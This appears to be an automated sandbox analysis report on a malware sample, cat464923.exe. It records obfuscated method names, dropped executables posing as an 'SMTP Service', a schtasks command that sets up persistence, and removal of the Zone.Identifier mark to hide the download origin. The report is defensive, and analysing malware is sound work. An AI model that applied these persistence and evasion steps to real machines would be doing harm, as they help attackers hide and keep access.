Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\AppData\Roaming\cat464923.exe File created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\cat464923.exe Jump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp60E5.tmp'

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Roaming\cat464923.exe File opened: C:\Users\user\AppData\Roaming\cat464923.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
